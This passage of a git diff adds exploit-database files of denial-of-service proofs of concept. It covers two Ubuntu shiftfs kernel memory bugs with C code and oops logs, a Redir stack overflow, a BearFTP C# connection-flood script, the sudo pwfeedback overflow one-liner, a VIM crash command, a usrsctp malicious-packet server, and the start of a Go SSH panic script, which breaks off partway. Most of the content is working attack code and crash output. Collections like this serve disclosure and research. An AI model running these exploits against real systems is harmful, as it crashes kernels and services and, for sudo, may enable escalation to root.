+[   72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
+[   72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
+[   72.284048] FS:  00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
+[   72.287161] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[   72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
+[   72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[   72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+==================================================================
+
+Faulting code:
+
+0000000F  55                push rbp
+00000010  4889E5            mov rbp,rsp
+00000013  4157              push r15
+00000015  4156              push r14
+00000017  4155              push r13
+00000019  4154              push r12
+0000001B  488B87C8000000    mov rax,[rdi+0xc8]
+00000022  4C8B6810          mov r13,[rax+0x10]
+00000026  498B4528          mov rax,[r13+0x28]
+0000002A  4883786000        cmp qword [rax+0x60],byte +0x0     <<<< GPF HERE
+0000002F  0F8497000000      jz near 0xcc
+00000035  4989FC            mov r12,rdi
+00000038  4989F6            mov r14,rsi
+
+As you can see, the poison value 6b6b6b6b6b6b6b6b is being dereferenced.
\ No newline at end of file
diff --git a/exploits/linux/dos/47693.txt b/exploits/linux/dos/47693.txt
new file mode 100644
index 000000000..770f9b95a
--- /dev/null
+++ b/exploits/linux/dos/47693.txt
@@ -0,0 +1,311 @@
+Tested on Ubuntu 19.10, kernel "5.3.0-19-generic #20-Ubuntu".
+
+Ubuntu ships a filesystem "shiftfs" in fs/shiftfs.c in the kernel tree that
+doesn't exist upstream. This filesystem can be mounted from user namespaces,
+meaning that this is attack surface from unprivileged userspace in the default
+installation.
+
+There are two memory safety bugs around shiftfs_btrfs_ioctl_fd_replace().
+
+#################### Bug 1: Flawed reference counting ####################
+
+In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
+
+
+	src = fdget(oldfd);
+	if (!src.file)
+		return -EINVAL;
+	// src holds one reference (assuming multithreaded execution)
+
+	ret = shiftfs_real_fdget(src.file, lfd);
+	// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
+	// extra references
+	fdput(src);
+	// this drops the only reference we were holding on src, and src was
+	// the only thing holding a reference to lfd->file. lfd->file may be
+	// dangling at this point.
+	if (ret)
+		return ret;
+
+	*newfd = get_unused_fd_flags(lfd->file->f_flags);
+	if (*newfd < 0) {
+		// always a no-op
+		fdput(*lfd);
+		return *newfd;
+	}
+
+	fd_install(*newfd, lfd->file);
+	// fd_install() consumes a counted reference, but we don't hold any
+	// counted references. so at this point, if lfd->file hasn't been freed
+	// yet, its refcount is one lower than it ought to be.
+
+	[...]
+
+	// the following code is refcount-neutral, so the refcount stays one too
+	// low.
+	if (ret)
+		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
+
+
+shiftfs_real_fdget() is implemented as follows:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+	struct shiftfs_file_info *file_info = file->private_data;
+	struct file *realfile = file_info->realfile;
+
+	lowerfd->flags = 0;
+	lowerfd->file = realfile;
+
+	/* Did the flags change since open? */
+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+	return 0;
+}
+
+Therefore, the following PoC will cause reference count overdecrements; I ran it
+with SLUB debugging enabled and got the following splat:
+
+=======================================
+user@ubuntu1910vm:~/shiftfs$ cat run.sh
+#!/bin/sh
+sync
+unshare -mUr ./run2.sh
+t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
+#!/bin/sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+touch mnt/tmpfs/foo
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <err.h>
+#include <unistd.h>
+#include <linux/btrfs.h>
+#include <sys/mman.h>
+
+int main(void) {
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = openat(root, "foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+  sleep(1);
+  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (map != MAP_FAILED) munmap(map, 0x1000);
+}
+user@ubuntu1910vm:~/shiftfs$ ./run.sh
+none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[  183.463452] general protection fault: 0000 [#1] SMP PTI
+[  183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[  183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[  183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[  183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[  183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[  183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[  183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[  183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[  183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[  183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[  183.499011] FS:  00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[  183.501679] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[  183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[  183.510580] Call Trace:
+[  183.511396]  mmap_region+0x417/0x670
+[  183.512592]  do_mmap+0x3a8/0x580
+[  183.513655]  vm_mmap_pgoff+0xcb/0x120
+[  183.514863]  ksys_mmap_pgoff+0x1ca/0x2a0
+[  183.516155]  __x64_sys_mmap+0x33/0x40
+[  183.517352]  do_syscall_64+0x5a/0x130
+[  183.518548]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[  183.520196] RIP: 0033:0x7f1d01bfaaf6
+[  183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[  183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[  183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
+[  183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[  183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
+[  183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
+[  183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
+[  183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
+[  183.560350] ---[ end trace 4a860910803657c2 ]---
+[  183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[  183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[  183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[  183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[  183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[  183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[  183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[  183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[  183.582411] FS:  00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[  183.584960] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[  183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+=======================================
+
+Disassembly of surrounding code:
+
+55                push rbp
+4889E5            mov rbp,rsp
+4157              push r15
+4156              push r14
+4155              push r13
+4154              push r12
+488B87C8000000    mov rax,[rdi+0xc8]
+4C8B6810          mov r13,[rax+0x10]
+498B4528          mov rax,[r13+0x28]
+4883786000        cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
+0F8497000000      jz near 0xcc
+4989FC            mov r12,rdi
+4989F6            mov r14,rsi
+
+This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
+think this corresponds to the load of "realfile->f_op->mmap" in the source code.
+
+
+
+#################### Bug 2: Type confusion ####################
+
+shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
+passes the resulting file* into shiftfs_real_fdget(), which does this:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+	struct shiftfs_file_info *file_info = file->private_data;
+	struct file *realfile = file_info->realfile;
+
+	lowerfd->flags = 0;
+	lowerfd->file = realfile;
+
+	/* Did the flags change since open? */
+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+	return 0;
+}
+
+file->private_data is a void* that points to a filesystem-dependent type; and
+some filesystems even use it to store a type-cast number instead of a pointer.
+The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
+
+As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
+(with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
+offset 0x10), and I use that to cause a memory dereference somewhere around
+0x4242:
+
+
+=======================================
+user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
+#!/bin/sh
+sync
+unshare -mUr ./run2.sh
+user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
+#!/bin/sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <err.h>
+#include <unistd.h>
+#include <linux/btrfs.h>
+#include <sys/mman.h>
+
+int main(void) {
+  // make our vmacache sequence number something like 0x4242
+  for (int i=0; i<0x4242; i++) {
+    void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
+        MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
+    if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
+    munmap(x, 0x1000);
+  }
+
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = open("/proc/self/environ", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  // trigger the confusion
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+}
+user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
+none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[  348.103005] BUG: unable to handle page fault for address: 0000000000004289
+[  348.105060] #PF: supervisor read access in kernel mode
+[  348.106573] #PF: error_code(0x0000) - not-present page
+[  348.108102] PGD 0 P4D 0 
+[  348.108871] Oops: 0000 [#1] SMP PTI
+[  348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[  348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[  348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+[  348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+[  348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+[  348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+[  348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+[  348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+[  348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+[  348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+[  348.133421] FS:  00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+[  348.135753] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+[  348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[  348.143545] Call Trace:
+[  348.144272]  shiftfs_ioctl+0x65/0x76 [shiftfs]
+[  348.145562]  do_vfs_ioctl+0x407/0x670
+[  348.146620]  ? putname+0x4a/0x50
+[  348.147556]  ksys_ioctl+0x67/0x90
+[  348.148514]  __x64_sys_ioctl+0x1a/0x20
+[  348.149593]  do_syscall_64+0x5a/0x130
+[  348.150658]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[  348.152108] RIP: 0033:0x7f77fa76767b
+[  348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
+[  348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
+[  348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
+[  348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
+[  348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
+[  348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
+[  348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
+[  348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
+[  348.188617] CR2: 0000000000004289
+[  348.189586] ---[ end trace dad859a1db86d660 ]---
+[  348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+[  348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+[  348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+[  348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+[  348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+[  348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+[  348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+[  348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+[  348.210395] FS:  00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+[  348.212710] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[  348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+[  348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[  348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+Killed
+user@ubuntu1910vm:~/shiftfs_confuse$ 
+=======================================
\ No newline at end of file
diff --git a/exploits/linux/dos/47919.txt b/exploits/linux/dos/47919.txt
new file mode 100644
index 000000000..d357355d4
--- /dev/null
+++ b/exploits/linux/dos/47919.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Redir 3.3 - Denial of Service (PoC)
+# Date: 2020-01-14
+# Exploit Author: hieubl from HPT Cyber Security
+# Vendor Homepage: https://github.com/troglobit/redir
+# Software Link: https://github.com/troglobit/redir
+# Version: 3.3
+# Tested on: Kali GNU/Linux Rolling 2019.4
+# CVE : [if applicable]
+
+The source code of redir.c contains doproxyconnect() function which
+has the stack overflow vulnerability:
+
+void doproxyconnect(int socket)
+{
+	int x;
+	char buf[128];
+
+	/* write CONNECT string to proxy */
+	sprintf((char *)&buf, "CONNECT %s HTTP/1.0\n\n", connect_str);
+	x = write(socket, (char *)&buf, strlen(buf));
+	if (x < 1) {
+		syslog(LOG_ERR, "Failed writing to proxy: %s", strerror(errno));
+		exit(1);
+	}
+	/* now read result */
+	x = read(socket, (char *)&buf, sizeof(buf));
+	if (x < 1) {
+		syslog(LOG_ERR, "Failed reading reply from proxy: %s", strerror(errno));
+		exit(1);
+	}
+	/* no more error checking for now -- something should be added later */
+	/* HTTP/1.0 200 Connection established */
+}
+
+Download and build:
+# git clone https://github.com/troglobit/redir.git
+# cd redir
+# ./autogen.sh
+# ./configure
+# make
+
+Proof of Concept:
+  In 1st terminal:
+    # gdb -q ./redir
+    # set follow-fork-mode child
+    # r -x AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+:1234 hpt.vn:80
+
+  In 2nd terminal:
+    # nc localhost 1234
+
+  After that, the program in 1st terminal will crash because of buffer
+overflow vulnerability.
+    ...
+    ► 0x5555555571b0 <doproxyconnect+144>    ret    <0x4141414141414141>
+    ...
+    Program received signal SIGSEGV (fault address 0x0)
+    pwndbg>
\ No newline at end of file
diff --git a/exploits/linux/dos/47987.cs b/exploits/linux/dos/47987.cs
new file mode 100644
index 000000000..55f6c0e8d
--- /dev/null
+++ b/exploits/linux/dos/47987.cs
@@ -0,0 +1,43 @@
+# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
+# Date: 2020-01-29
+# Exploit Author: kolya5544
+# Vendor Homepage: http://iktm.me/
+# Software Link: https://github.com/kolya5544/BearFTP/releases
+# Version: v0.0.1 - v0.1.0
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2020-8416
+
+static void Main(string[] args)
+        {
+            Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
+            for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
+            {
+                new Thread(() =>
+                {
+                    Thread.CurrentThread.IsBackground = true;
+
+                    TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
+                    var ns = exploit.GetStream();
+                    StreamWriter sw = new StreamWriter(ns);
+                    sw.AutoFlush = true;
+                    StreamReader sr = new StreamReader(ns);
+
+
+                    while (true)
+                    {
+                        Thread.Sleep(5000); //We just spend our time.
+                    }
+                }).Start();
+                Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
+            }
+            while (true)
+            {
+                Console.WriteLine("DoS attack completed!");
+                Thread.Sleep(20000);
+            }
+        }
+/*
+BEFORE PATCH APPLIED (after ~100 seconds of attacking):
+3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped
+AFTER PATCH APPLIED:
+10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */
\ No newline at end of file
diff --git a/exploits/linux/dos/47995.txt b/exploits/linux/dos/47995.txt
new file mode 100644
index 000000000..a00369a85
--- /dev/null
+++ b/exploits/linux/dos/47995.txt
@@ -0,0 +1,33 @@
+# Title: Sudo 1.8.25p - Buffer Overflow
+# Date: 2020-01-30
+# Author: Joe Vennix
+# Software: Sudo
+# Versions: Sudo versions prior to 1.8.26
+# CVE: CVE-2019-18634
+# Reference: https://www.sudo.ws/alerts/pwfeedback.html
+
+# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting 
+# their password. For each key press, an asterisk is printed. This option was added in 
+# response to user confusion over how the standard Password: prompt disables the echoing 
+# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo,
+# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.
+
+# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow.
+# This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled.
+
+The folowing sudoers configuration is vulnerable:
+
+    $ sudo -l
+    Matching Defaults entries for millert on linux-build:
+	insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail
+
+    User millert may run the following commands on linux-build:
+	(ALL : ALL) ALL
+
+# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled. 
+# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.
+
+    $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
+    Password: Segmentation fault
+
+If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.
\ No newline at end of file
diff --git a/exploits/linux/dos/48008.txt b/exploits/linux/dos/48008.txt
new file mode 100644
index 000000000..fc1a68748
--- /dev/null
+++ b/exploits/linux/dos/48008.txt
@@ -0,0 +1,11 @@
+# Exploit Title: VIM 8.2 - Denial of Service (PoC)
+# Date: 2019-12-17
+# Vulnerability: DoS
+# Vulnerability Discovery: Dhiraj Mishra
+# Vulnerable Version: VIM - Vi IMproved 8.2 (Included patches: 1-131)
+# Vendor Homepage: https://www.vim.org/
+# References:
+# https://github.com/vim/vim/commit/98a336dd497d3422e7efeef9f24cc9e25aeb8a49
+#  Invalid memory access with search command
+
+PoC: vim --clean -e -s -c 'exe "norm /\x80PS"'
\ No newline at end of file
diff --git a/exploits/linux/dos/48034.py b/exploits/linux/dos/48034.py
new file mode 100755
index 000000000..554df2b48
--- /dev/null
+++ b/exploits/linux/dos/48034.py
@@ -0,0 +1,76 @@
+'''
+usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctp_load_addresses_from_init function of usersctp that can lead to a number of out-of-bound reads. The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters, however there is a difference in how these functions handle parameter bounds. The function sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside of the limit of the chunk, meanwhile, sctp_load_addresses_from_init will continue processing until a parameter that is entirely outside of the chunk occurs. This means that the last parameter of a chunk is not always verified, which can lead to parameters with very short plen values being processed by sctp_load_addresses_from_init. This can lead to out-of-bounds reads whenever the plen is subtracted from the header len.
+
+To reproduce this issue:
+
+1) run the attached 'server', initack.py
+
+    python init_ack.py
+
+2) run the sample usersctp client
+
+./programs/.libs/client 127.0.0.1 7 0 8888 7777
+
+
+The client will crash.
+'''
+
+import sys
+from socket import *
+import zlib
+
+
+ECHO_PORT = 7777
+BUFSIZE = 1024
+
+def getshort(arr):
+	return ord(arr[1]) + (ord(arr[0]) << 8);
+
+
+def getlen(arr):
+	return ord(arr[0]) + (ord(arr[1]) << 8);
+
+
+def main():
+
+        server()
+
+def print_pack(pack):
+	o = ""
+	for item in pack:
+		o = o + hex(ord(item)) + " "
+	print "PACKET SENT", o
+
+def server():
+    times = 0
+    if len(sys.argv) > 2:
+        port = eval(sys.argv[2])
+    else:
+        port = ECHO_PORT
+    s = socket(AF_INET, SOCK_DGRAM)
+    s.bind(('', port))
+    print 'udp echo server ready'
+    while 1:
+        data, addr = s.recvfrom(BUFSIZE)
+	pack = ""
+	for item in data:
+		pack = pack + hex(ord(item)) + " "
+        print 'server received %r from %r' % (pack, addr)
+
+	vtag = data[16:20]
+	type = ord(data[12])
+	length = getshort(data[14:])
+
+	port = "\x00\x07" + data[0:2]
+	print "type", type, "len", length, "plen", len(data)
+	ia = "\x86\x02\x01\x00\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\x18\x33\x03\xc3\x07\x00\x01\x8e\x05\x00\x07\x00\x14\x0b\x36\x14\x01\x30\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\xf9\x33\x05\x80\x03\x00\x01"
+	print "vtag", hex(ord(vtag[0])), hex(ord(vtag[1])), hex(ord(vtag[2])), hex(ord(vtag[3]))
+	o = port + "\0\0\0\0" + "\0\0\0\0" + vtag + ia[1:]
+        crc = zlib.crc32(o) & 0xffffffff
+        crcb= chr(crc&0xf) + chr((crc>> 8)&0xf) + chr((crc>> 16)&0xf) + chr((crc>> 24)&0xf)
+      	o = port + vtag + crcb + ia[1:]
+	print_pack(o) 
+	s.sendto(o, addr)
+
+
+main()
\ No newline at end of file
diff --git a/exploits/linux/dos/48121.py b/exploits/linux/dos/48121.py
new file mode 100755
index 000000000..3c2f74592
--- /dev/null
+++ b/exploits/linux/dos/48121.py
@@ -0,0 +1,61 @@
+# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)
+# Author: Mark Adams
+# Date: 2020-02-21
+# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py
+# CVE: CVE-2020-9283
+#
+# Running this script may crash the remote SSH server if it is vulnerable.
+# The GitHub repository contains a vulnerable and fixed SSH server for testing.
+#
+# $ python poc.py
+# ./poc.py <host> <port> <user>
+#
+# $ python poc.py localhost 2022 root
+# Malformed auth request sent. This should cause a panic on the remote server.
+#
+
+#!/usr/bin/env python
+
+import socket
+import sys
+
+import paramiko
+from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST
+
+if len(sys.argv) != 4:
+    print('./poc.py <host> <port> <user>')
+    sys.exit(1)
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+user = sys.argv[3]
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((host, port))
+
